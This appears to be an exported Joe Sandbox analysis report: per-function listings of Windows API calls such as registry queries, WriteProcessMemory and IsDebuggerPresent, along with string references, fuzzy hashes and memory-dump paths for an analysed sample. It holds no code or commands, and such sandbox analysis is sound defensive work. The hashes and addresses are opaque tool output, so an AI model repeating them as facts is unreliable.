                                                                        • Instruction ID: d45cfe727ae6fd1c611dd6711a57daa7caac2bf0fc5f798166e283836efb7d87
                                                                        • Opcode Fuzzy Hash: d3571c8c23943aad0dd4fe49d3275653fadddc2db7ce0cdceb924f094a89006d
                                                                        • Instruction Fuzzy Hash: 41411870A10249EFDF05DFA8D881AEEBBF1BF08300F04846AF955A7292D7309A15CB60
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3___cftoe
                                                                        • String ID: !%x
                                                                        • API String ID: 855520168-1893981228
                                                                        • Opcode ID: bcd4a4b2c600fe3161c55dd08ea46bf838ed41e4fb11b6f1693d3bae2f11a996
                                                                        • Instruction ID: c9d187cc46a78307c6ed2d9cf9967bece0f17e9feb43662cb46af59bbcd31dcc
                                                                        • Opcode Fuzzy Hash: bcd4a4b2c600fe3161c55dd08ea46bf838ed41e4fb11b6f1693d3bae2f11a996
                                                                        • Instruction Fuzzy Hash: 2C313B75A01209EBDF04DFA4D9859EEBBF2FF48304F204469F905AB251E7359E15CB50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: 4270a719f4994e3363ee459dc16cf3c7e51991d7dffdca5c410c573d4da98eed
                                                                        • Instruction ID: 081a6c305cbf187643f24d680477933a4fff1f9422e57c20ad9292f84d172eb4
                                                                        • Opcode Fuzzy Hash: 4270a719f4994e3363ee459dc16cf3c7e51991d7dffdca5c410c573d4da98eed
                                                                        • Instruction Fuzzy Hash: 6021D3711083849FD711CF19C859B9BBBE9AF89304F04895DF99887292D634D918C7A3
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: e9cbbfad91bd3961ae967f72aa28137c8c1961ec0dc88d240fe87ae43ceab19c
                                                                        • Instruction ID: a48fce4764f0ce38e68e9d762a06130d17d192fbbae10a0585a0026fa4cd76f0
                                                                        • Opcode Fuzzy Hash: e9cbbfad91bd3961ae967f72aa28137c8c1961ec0dc88d240fe87ae43ceab19c
                                                                        • Instruction Fuzzy Hash: 8821D3762083859FE711CF19C845B9BBBE9EBC9300F14881DF99487292C734D918CBA7
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: _swprintf
                                                                        • String ID: %$+
                                                                        • API String ID: 589789837-2626897407
                                                                        • Opcode ID: e1318e7f67a0e2061c12e2379b86369c763334f931844ff509ae279dd58f304f
                                                                        • Instruction ID: 221b72f08a373f64df5435de97d1589fc29c3f56f380cd534d40cdbd876e5ee4
                                                                        • Opcode Fuzzy Hash: e1318e7f67a0e2061c12e2379b86369c763334f931844ff509ae279dd58f304f
                                                                        • Instruction Fuzzy Hash: D721B0712083859FE711CF29C845B9BBBEAEBD9300F14881DF99487292C734D918CBA3
                                                                        APIs
                                                                        • ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00AE8116
                                                                        • LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,1816BA6E), ref: 00AE8185
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertFreeLocalString
                                                                        • String ID: Invalid SID
                                                                        • API String ID: 3201929900-130637731
                                                                        • Opcode ID: df686111f71d6dd023cef98f7a5a4c25b76c361a0e97387e3a872f1653eb3cde
                                                                        • Instruction ID: 90a0c893e026e2dd3c23d75c3ff348a27ad749fc270fe5eb8bc2677ef889cb87
                                                                        • Opcode Fuzzy Hash: df686111f71d6dd023cef98f7a5a4c25b76c361a0e97387e3a872f1653eb3cde
                                                                        • Instruction Fuzzy Hash: 7921AE75A003459BDB10CF59C819BAFFBF8FF44B04F10464EE905A7280DBB96A458BD0
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AEC16B
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00AEC1CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                        • String ID: bad locale name
                                                                        • API String ID: 3988782225-1405518554
                                                                        • Opcode ID: b796df69df8f488564213e1336a7ef63d77b633ac599aed4185e93ddfb560d90
                                                                        • Instruction ID: 25aa72508c809f5493451065fb08f7c04179a396d32802c2329c234c3af9f679
                                                                        • Opcode Fuzzy Hash: b796df69df8f488564213e1336a7ef63d77b633ac599aed4185e93ddfb560d90
                                                                        • Instruction Fuzzy Hash: 2D21FD70809B88EED721CFA8C90474BBFF4EF15710F14869EE08997781D7B5AA04CBA1
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog3_
                                                                        • String ID: false$true
                                                                        • API String ID: 2427045233-2658103896
                                                                        • Opcode ID: 5e494e3154a22e947b2c1e84bb02f3d8142b440de579cc2d33a7f01e3181f0d5
                                                                        • Instruction ID: b9eae0fc620a1b36e71054fd1d5a7d20b04d11cdca4831a49cda33d8d816d5e9
                                                                        • Opcode Fuzzy Hash: 5e494e3154a22e947b2c1e84bb02f3d8142b440de579cc2d33a7f01e3181f0d5
                                                                        • Instruction Fuzzy Hash: E5110471D40749AEC724EFB4D852B9BBBF4EF09300F00856AF2A58B251EB30E504CB90
                                                                        APIs
                                                                          • Part of subcall function 00AF0B00: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,1816BA6E,?,00B293B0,000000FF), ref: 00AF0B27
                                                                          • Part of subcall function 00AF0B00: GetLastError.KERNEL32(?,00000000,00000000,1816BA6E,?,00B293B0,000000FF), ref: 00AF0B31
                                                                        • IsDebuggerPresent.KERNEL32(?,?,00B3FAD8), ref: 00AF1E48
                                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00B3FAD8), ref: 00AF1E57
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00AF1E52
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 3511171328-631824599
                                                                        • Opcode ID: 01e975ac5f248ade002a1b4312551b4b8660e463ee2c6fddfbfe61f3c0660bd8
                                                                        • Instruction ID: 6e3530e77b5d420eaa96bea835ff75bbbc33f8acb17e66c5fb3477cb63ebc34a
                                                                        • Opcode Fuzzy Hash: 01e975ac5f248ade002a1b4312551b4b8660e463ee2c6fddfbfe61f3c0660bd8
                                                                        • Instruction Fuzzy Hash: 59E09270600711CFC3309FAAE9047667BE4AF05704F80885DF986C3651DBB4E844CB92
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,40000022,1816BA6E,?,00000000,?,?,?,?,00B29DA0,000000FF,?,00AE6432,00000000,?), ref: 00AE6CC4
                                                                        • LocalAlloc.KERNEL32(00000040,3FFFFFFF,1816BA6E,?,00000000,?,?,?,?,00B29DA0,000000FF,?,00AE6432,00000000,?), ref: 00AE6CE7
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00B29DA0,000000FF,?,00AE6432,00000000), ref: 00AE6D87
                                                                        • LocalFree.KERNEL32(?,1816BA6E,00000000,00B293B0,000000FF,?,00000000,00000000,00B29DA0,000000FF,1816BA6E), ref: 00AE6E0D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 8ea78576166097063b433a760416828eefb38dfd761bda0c75daee97b1eae676
                                                                        • Instruction ID: 616b4f1c7874917d2cac5d6be71b5aeb30f4932e6b9f117d76d73a551c060d91
                                                                        • Opcode Fuzzy Hash: 8ea78576166097063b433a760416828eefb38dfd761bda0c75daee97b1eae676
                                                                        • Instruction Fuzzy Hash: 2C51B0B5A006459FDB18CF69CD85BAEBBB4FB58350F24462DE815E7380DB31AE10CB90
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00AE4B05
                                                                        • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00AE4B25
                                                                        • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00AE4BAB
                                                                        • LocalFree.KERNEL32(00000000,1816BA6E,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00AE4C2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Local$AllocFree
                                                                        • String ID:
                                                                        • API String ID: 2012307162-0
                                                                        • Opcode ID: 8c71bbe2b7e9b097bc520859c5fd01e4e9f6914aaae8c23f05d31655dddc5376
                                                                        • Instruction ID: 656e3b20d420f2c6b947fc79578abb2f0ea278a6f7770d441a6c9f36b493d154
                                                                        • Opcode Fuzzy Hash: 8c71bbe2b7e9b097bc520859c5fd01e4e9f6914aaae8c23f05d31655dddc5376
                                                                        • Instruction Fuzzy Hash: CA51EE326042559FC7249F29DC80A6AB7EDFF88360F100A6EF866D7691DB70E9008B91

                                                                        Execution Graph

                                                                        Execution Coverage:1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:144
                                                                        Total number of Limit Nodes:8
                                                                        Execution Graph (rendered graph not preserved in the text export)

                                                                        Control-flow Graph of the function at cca83b (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • __mtterm.LIBCMT ref: 00CCA88F
                                                                          • Part of subcall function 00CCB649: TlsFree.KERNEL32(00CDC65C,00CCA8F6), ref: 00CCB674
                                                                        • __mtterm.LIBCMT ref: 00CCA8F1
                                                                        • __freeptd.LIBCMT ref: 00CCA961
                                                                          • Part of subcall function 00CCB615: TlsGetValue.KERNEL32(?,00CCB784,?,?,00CCBD83,00CCA0BB), ref: 00CCB61E
                                                                          • Part of subcall function 00CCB615: TlsSetValue.KERNEL32(00000000,00CCB784,?,?,00CCBD83,00CCA0BB), ref: 00CCB63F
                                                                          • Part of subcall function 00CCAA89: HeapFree.KERNEL32(00000000,?), ref: 00CCAAF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4442189161.0000000000CCA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CCA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_cca000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FreeValue__mtterm$Heap__freeptd
                                                                        • String ID:
                                                                        • API String ID: 514583591-0
                                                                        • Opcode ID: 705a112cbdc3a22f5882c665b9edd7327f068e89c047d61395d3de836778bc0e
                                                                        • Instruction ID: 3a56ea319551f552f09ad4a4777cfb9e1882383b4520a202562f9fe167a5019b
                                                                        • Opcode Fuzzy Hash: 705a112cbdc3a22f5882c665b9edd7327f068e89c047d61395d3de836778bc0e
                                                                        • Instruction Fuzzy Hash: C12185315156499AAA257BF6DC0BF2E2354AE51768B25053FF826C10E2EF30C943B563

                                                                        Control-flow Graph of the function at bc51d0 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        Strings
                                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 00BC524C
                                                                        • MS Shell Dlg 2, xrefs: 00BC5260
                                                                        • Tahoma, xrefs: 00BC5218
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                        • API String ID: 0-1011973972
                                                                        • Opcode ID: fdd2317b3353e6ad9bfc121bc5e1db08e9daaf5440d29eb7473e8bc79b2b5465
                                                                        • Instruction ID: 5becec0d28a5880ced5f979aa5ed0a2c0af5335a63636234b47c5e0a7e207534
                                                                        • Opcode Fuzzy Hash: fdd2317b3353e6ad9bfc121bc5e1db08e9daaf5440d29eb7473e8bc79b2b5465
                                                                        • Instruction Fuzzy Hash: C511C170A04A48AFDB21DBA8CD52F5D7BE5EB86300F5244ACF8009B761D731AE81CB24

                                                                        Control-flow Graph of the function at ac7778 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000), ref: 00AC77F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 9fbf596afc2829dac4cc4bd97f40f6d8766269636b3ff4738d1a27f1a17cca5d
                                                                        • Instruction ID: 73a4cd5d349cb19b7d6f16d8d0ee3d37c3a7dabc71e4f899909df267541c8b84
                                                                        • Opcode Fuzzy Hash: 9fbf596afc2829dac4cc4bd97f40f6d8766269636b3ff4738d1a27f1a17cca5d
                                                                        • Instruction Fuzzy Hash: 5E519230F04608BFDB11EBA8CD42F9EB7F9AB45304F1684ADA444E3352DA749F059B95

                                                                        Control-flow Graph of the function at ac7774 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000), ref: 00AC77F1
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: d6bd4821bdf9d04fcac10f3201da6ae18b21a009d3ef992bafcbde9d2af0d0f5
                                                                        • Instruction ID: 2544c746c7e53f89180e3945df95b99cbb07a79af5d52a1b2e6c79d5a43d55a3
                                                                        • Opcode Fuzzy Hash: d6bd4821bdf9d04fcac10f3201da6ae18b21a009d3ef992bafcbde9d2af0d0f5
                                                                        • Instruction Fuzzy Hash: AE21C430F08208AFDB11DBA8C852F9EB7F9AB89300F1244BDA405D3752DA349F059B91

                                                                        Control-flow Graph of the function at ac84f8 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,?,00AC81D5), ref: 00AC8523
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 1d5f3f86dedde77f2cc65ac5e2bb92246038e4666bc3d9ae829a385b828df950
                                                                        • Instruction ID: 9b7f7dbae99cd7e3b23507eba38d52e75aa4f63b17ce7d99fe823933f2104a1a
                                                                        • Opcode Fuzzy Hash: 1d5f3f86dedde77f2cc65ac5e2bb92246038e4666bc3d9ae829a385b828df950
                                                                        • Instruction Fuzzy Hash: 00017172A04208AFC700EFADDC81FDEB7ACEB49314F10816AF914D7341DA759E048BA1

                                                                        Control-flow Graph of the function at cbb7b0 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • WriteProcessMemory.KERNELBASE(?,000000FF,?,?,00000005,00000000), ref: 00CBB7F5
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4442189161.0000000000CBB000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CBB000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_cbb000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: MemoryProcessWrite
                                                                        • String ID:
                                                                        • API String ID: 3559483778-0
                                                                        • Opcode ID: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction ID: 2a630beec46ceb65d1739b525620c74ac3b2205c7dfad7fc430d6d96663da261
                                                                        • Opcode Fuzzy Hash: f724551797df3d079ec7630f68a98d8fc8fbe16478561887b9490916555449d7
                                                                        • Instruction Fuzzy Hash: 94F0597174020E26EB148CBDDC41BFEBB9ECBC2730F1583A9B929C62D4F9B08C0542A1

                                                                        Control-flow Graph of the function at ac7ef8 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,?,?,?,00AC80FC), ref: 00AC7F29
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 972ba05ce29618aa42862d91a2d9de7cc2086f4e2c72ff7865856a7a5a4c30d8
                                                                        • Instruction ID: fd5e113207806c8e14beccf2bafd10ca6dba437321e3dff59b23290d0690aeeb
                                                                        • Opcode Fuzzy Hash: 972ba05ce29618aa42862d91a2d9de7cc2086f4e2c72ff7865856a7a5a4c30d8
                                                                        • Instruction Fuzzy Hash: 92F039627082006FE304EAAD9D85FAFA6DCDBC9711F14843EB258C7342D964CC0587B6

                                                                        Control-flow Graph of the function at ac74bc (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        APIs
                                                                        • RegCloseKey.KERNELBASE(00000000,?,00AC7528,?,?,00000000,00AC773F), ref: 00AC74D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000AC3000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AC3000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_ac3000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: dee2712be3680a920236bd3b1f0a9c1fb83549ded90d691d759de67f12ecb027
                                                                        • Instruction ID: 945fdbfdab84bf8a4e07382fdd641580bbfe9f5f9fdac05323158d3f4926ae2c
                                                                        • Opcode Fuzzy Hash: dee2712be3680a920236bd3b1f0a9c1fb83549ded90d691d759de67f12ecb027
                                                                        • Instruction Fuzzy Hash: 51D067B1A082019ADF64EFB9CAC5B06BBDC6B45311B48C4AAA808CF247D624D9508B25

                                                                        Control-flow Graph of the function at c28164 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000C09000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C09000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_c09000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: comctl32.dll
                                                                        • API String ID: 0-431930879
                                                                        • Opcode ID: d05886b4a54a592d5ed20caeaa514d70a6fb6a4293b87ed2a5fba88c29ed6ada
                                                                        • Instruction ID: c3f6e85038296e42f779a8efa20f196a7faa9d335ceb47d8cf16ebb6a46a5066
                                                                        • Opcode Fuzzy Hash: d05886b4a54a592d5ed20caeaa514d70a6fb6a4293b87ed2a5fba88c29ed6ada
                                                                        • Instruction Fuzzy Hash: CD118275A05750CFC360DF6CE98178ABBF0FB0A710B044629E885C3B62E730E949CB95

                                                                        Control-flow Graph of the function at 11b2bbe (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4454509843.00000000011B2000.00000020.00000001.01000000.00000007.sdmp, Offset: 011B2000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_11b2000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: =
                                                                        • API String ID: 0-2322244508
                                                                        • Opcode ID: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction ID: cb30cbb8f3689df55e39e504f51f89424b657811c893f108889f2c30a377c2ee
                                                                        • Opcode Fuzzy Hash: 8747d4d4a66007d555ded7271ff69db9a91538b04c7af679efe992322c3592e5
                                                                        • Instruction Fuzzy Hash: 4CF05C11968146DFC721CA3884C0F677BE1CF96311F25976CB89A8B641D2794C0EE601

                                                                        Control-flow Graph of the function at c80354 (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000C80000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C80000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_c80000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9544d67cf13d5efbcfbf0120930a956e436574231354a15e3b4163e4a05c7860
                                                                        • Instruction ID: 8166a185a15cbf7c805bc04530e2a9bdf41072170399c599da972417e0068558
                                                                        • Opcode Fuzzy Hash: 9544d67cf13d5efbcfbf0120930a956e436574231354a15e3b4163e4a05c7860
                                                                        • Instruction Fuzzy Hash: BC416D34A04244EFDB44DF69C881B9EB7F6EB89314F6185F5E851A7362C730AE44DB10

                                                                        Control-flow Graph of the function at bd5c0c (graph image and executed / not-executed block colouring not preserved in the text export)
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.4181918340.0000000000B9D000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B9D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_b9d000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 71f79e8fd14864fee11d3caa4384dd8dbb33b3a3e7beff81a1179f76641447c9
                                                                        • Instruction ID: 13975a8f6d1ba7fd18a4ed88d3aad5e4c64ca0885491117d5e0a9905dbac9742
